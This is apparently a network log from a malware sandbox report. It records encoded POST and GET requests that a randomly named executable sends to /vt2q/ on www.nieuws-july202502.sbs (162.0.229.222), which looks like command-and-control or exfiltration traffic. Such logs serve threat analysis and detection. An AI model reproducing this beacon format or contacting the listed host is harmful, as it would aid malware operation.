Nov 25, 2024 13:56:29.262732029 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 25, 2024 13:56:29.262746096 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 25, 2024 13:56:29.262854099 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 25, 2024 13:56:29.262867928 CET	294	IN	Data Raw: 44 f0 3a e6 d9 e5 de 2e 9c ef 06 f0 4f c8 5f 09 75 7d c5 fc 89 2c d7 ec 7f 0a dc cf 40 f5 a7 17 54 fd f9 53 6d 5c 04 7e 6f cb eb 1d 9f 87 ff 48 63 40 9d ef 94 f0 ac aa bb 6f 8f f0 67 ab 1e e1 8f cc 73 03 a8 0f f8 ba 8a 10 af 2c 3e 3e 57 f6 de 2b Data Ascii: D:.O_u},@TSm\~oHc@ogs,>>W+Lmu^fuaOmkt]zLr@8uUxvL\|oe OP&uNp^60n`f?{T1_>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	50010	162.0.229.222	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:30.599486113 CET	834	OUT	POST /vt2q/ HTTP/1.1 Host: www.nieuws-july202502.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.nieuws-july202502.sbs Referer: http://www.nieuws-july202502.sbs/vt2q/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 41 63 41 32 30 73 45 39 45 7a 77 37 2b 42 41 2f 74 30 32 52 34 61 4a 31 49 4f 56 68 33 33 77 56 45 4f 63 6f 65 6f 70 48 7a 61 6a 6e 6d 6d 43 45 51 78 50 46 6d 46 71 48 62 45 41 47 6a 37 72 44 69 41 61 50 74 46 41 35 6e 2f 73 38 50 34 79 50 64 6d 41 77 53 75 41 78 78 4f 70 74 47 62 64 34 4e 59 33 79 4a 42 6c 6a 61 43 37 48 7a 47 34 54 61 6d 69 6e 52 55 4a 4a 4d 76 44 71 59 36 75 65 44 56 68 71 34 41 77 79 51 42 66 44 58 6c 6a 47 47 53 72 38 39 6b 30 50 57 61 63 42 4c 64 4c 67 47 52 55 46 49 55 63 68 2f 79 6b 4a 4b 2f 45 74 42 67 6f 44 49 6f 63 44 6a 52 31 72 61 34 52 33 6a 65 46 7a 39 53 70 71 45 48 4d 75 6e 69 67 55 79 49 63 68 6b 61 4b 49 66 45 68 6a 75 63 70 6b 50 67 3d 3d Data Ascii: 0dfXG=AcA20sE9Ezw7+BA/t02R4aJ1IOVh33wVEOcoeopHzajnmmCEQxPFmFqHbEAGj7rDiAaPtFA5n/s8P4yPdmAwSuAxxOptGbd4NY3yJBljaC7HzG4TaminRUJJMvDqY6ueDVhq4AwyQBfDXljGGSr89k0PWacBLdLgGRUFIUch/ykJK/EtBgoDIocDjR1ra4R3jeFz9SpqEHMunigUyIchkaKIfEhjucpkPg==
Nov 25, 2024 13:56:31.928468943 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 25 Nov 2024 12:56:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 135CZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 25, 2024 13:56:31.928508997 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 25, 2024 13:56:31.928524971 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 25, 2024 13:56:31.928639889 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 25, 2024 13:56:31.928658009 CET	289	IN	Data Raw: 22 78 1d f3 ec 72 6f 17 ce 77 03 f8 27 e4 af 84 ba be 62 fe 44 96 6b f6 3f 05 ee 67 a0 fa d3 0b aa fe fc a9 36 2e 02 bf b7 e5 f5 8e cf c3 7f a4 31 a0 ce 77 4a 78 56 d5 dd b7 47 f8 b3 55 8f f0 47 e6 b9 01 d4 07 7c 5d 45 88 57 16 1f 9f 2b 7b ef 15 Data Ascii: "xrow'bDk?g6.1wJxVGUG\|]EW+{zuAthn6J~/6HKdu:.=}@nwti&O Tp*<{&GRS72S'(y[_8/LOwr70~k^w/PBGkj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	50018	162.0.229.222	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:33.268244028 CET	1847	OUT	POST /vt2q/ HTTP/1.1 Host: www.nieuws-july202502.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.nieuws-july202502.sbs Referer: http://www.nieuws-july202502.sbs/vt2q/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 41 63 41 32 30 73 45 39 45 7a 77 37 2b 42 41 2f 74 30 32 52 34 61 4a 31 49 4f 56 68 33 33 77 56 45 4f 63 6f 65 6f 70 48 7a 61 72 6e 6e 55 4b 45 51 54 6e 46 30 56 71 48 46 55 41 46 6a 37 72 37 69 41 53 4c 74 46 63 48 6e 35 67 38 65 75 2b 50 62 58 41 77 4a 2b 41 78 35 75 70 75 62 72 64 58 4e 59 6d 37 4a 42 56 6a 61 43 37 48 7a 41 45 54 64 33 69 6e 64 30 4a 4f 4c 76 43 72 4f 4b 76 78 44 55 49 66 34 44 63 69 58 78 2f 44 55 45 54 47 4b 45 2f 38 67 30 30 4a 47 4b 63 5a 4c 64 47 34 47 52 49 42 49 58 42 36 2f 78 34 4a 41 37 6c 73 51 79 30 6b 52 72 30 42 36 68 31 79 55 73 52 70 6c 4f 56 58 78 78 6c 33 49 32 30 44 6d 33 55 32 2f 36 59 74 6c 35 36 2f 55 44 6f 53 6a 76 6b 71 55 61 4a 61 77 30 72 78 58 47 52 58 68 4b 43 6f 6a 6d 4a 38 7a 52 70 54 32 63 31 4c 75 51 41 57 31 6b 59 55 68 6e 47 39 57 62 6b 34 30 48 74 72 56 75 6b 36 4f 59 64 57 36 57 66 59 70 52 62 76 4a 78 49 6b 79 73 34 49 69 71 4d 73 6a 62 49 77 2f 61 6b 43 6d 77 4d 62 45 36 77 39 6e 58 64 2f 4d 2b 66 31 7a 75 76 2f 45 4a 39 6a [TRUNCATED] Data Ascii: 0dfXG=AcA20sE9Ezw7+BA/t02R4aJ1IOVh33wVEOcoeopHzarnnUKEQTnF0VqHFUAFj7r7iASLtFcHn5g8eu+PbXAwJ+Ax5upubrdXNYm7JBVjaC7HzAETd3ind0JOLvCrOKvxDUIf4DciXx/DUETGKE/8g00JGKcZLdG4GRIBIXB6/x4JA7lsQy0kRr0B6h1yUsRplOVXxxl3I20Dm3U2/6Ytl56/UDoSjvkqUaJaw0rxXGRXhKCojmJ8zRpT2c1LuQAW1kYUhnG9Wbk40HtrVuk6OYdW6WfYpRbvJxIkys4IiqMsjbIw/akCmwMbE6w9nXd/M+f1zuv/EJ9jhAP3Clu3f96jjUk7WQOD2SEp2vAW7pp4sqv4EZ8YKjPrXdAvH4UKgbCyU9dWVupQtlOdMjzxbonqL/kyLaiXMJTTW5T05TPCjIkGhimOmk6PuJrbpG/nNYSXRyqSYsSUIzRo/anMvgiXC7gbeW276odrq5ex1yMUcIvuZhkFmXQwv9e+1ybgaUdPBTx4bd93pUCv/e3ynI43m3Xe9ZZvfcTforzQfn74gkYCQhASw5YRaAkl90CCayU4HcLjaal2tn82umDgMfSzt2LLFim7Aw+X8Z04ds5dTioKfPYhsBKbvuuI9V1OUYsOrao9NY9vwMvUPZOe8mXeaNUj4ZXAlxpFnUNcJ5SgpYR2rPvjPZ4r1BZRdVroM9iAaA1k9u3MuDQXCog11mHlPKJH8YVB6eCBQvCxHby8bORkeNb0v9phmBwfFfMT+AzcsDXLUpdM9+PjIu7YT7XJESDydoWWTKCC2pSrQk8NX+9jzyxScw0NdJOMOFi+54MfnvlznAo+H0TQ0gS717Xn9cYvlFvEn8ZioE3zoM8RZsB74F+GYOB72Nv7col2HG4tiJ3jVsBFUbd5IMopf8/cUaByPQZJBnkzryJwOB0yzfJ51iS+lg8uZ21S82kRaiCTut5kO2yZ1XmtsKTdycag9Av5/EWwZrWkzHVJbXuILU [TRUNCATED]
Nov 25, 2024 13:56:34.533963919 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 25 Nov 2024 12:56:34 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 25, 2024 13:56:34.533997059 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 25, 2024 13:56:34.534008980 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 25, 2024 13:56:34.534080982 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 25, 2024 13:56:34.534094095 CET	294	IN	Data Raw: 22 78 1d f3 ec 72 6f 17 ce 77 03 f8 27 e4 af 84 ba be 62 fe 44 96 6b f6 3f 05 ee 67 a0 fa d3 0b aa fe fc a9 36 2e 02 bf b7 e5 f5 8e cf c3 7f a4 31 a0 ce 77 4a 78 56 d5 dd b7 47 f8 b3 55 8f f0 47 e6 b9 01 d4 07 7c 5d 45 88 57 16 1f 9f 2b 7b ef 15 Data Ascii: "xrow'bDk?g6.1wJxVGUG\|]EW+{zuAthn6J~/6HKdu:.=}@nwti&O Tp*<{&GRS72S'(y[_8/LOwr70~k^w/PBGkj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	50021	162.0.229.222	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:35.924463987 CET	534	OUT	GET /vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj HTTP/1.1 Host: www.nieuws-july202502.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:56:37.529421091 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Mon, 25 Nov 2024 12:56:37 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 25, 2024 13:56:37.529447079 CET	224	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
Nov 25, 2024 13:56:37.529458046 CET	1236	IN	Data Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
Nov 25, 2024 13:56:37.529464006 CET	1236	IN	Data Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
Nov 25, 2024 13:56:37.529469967 CET	1236	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
Nov 25, 2024 13:56:37.529483080 CET	1236	IN	Data Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
Nov 25, 2024 13:56:37.529494047 CET	896	IN	Data Raw: 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e Data Ascii: MgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsR
Nov 25, 2024 13:56:37.529505014 CET	1236	IN	Data Raw: 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 7a 31 76 34 30 68 50 50 42 76 77 7a 71 4f 6c 75 54 76 68 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f Data Ascii: N7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuT
Nov 25, 2024 13:56:37.529521942 CET	1236	IN	Data Raw: 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c Data Ascii: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not
Nov 25, 2024 13:56:37.529532909 CET	583	IN	Data Raw: 73 65 72 76 65 72 22 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a Data Ascii: server"></li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
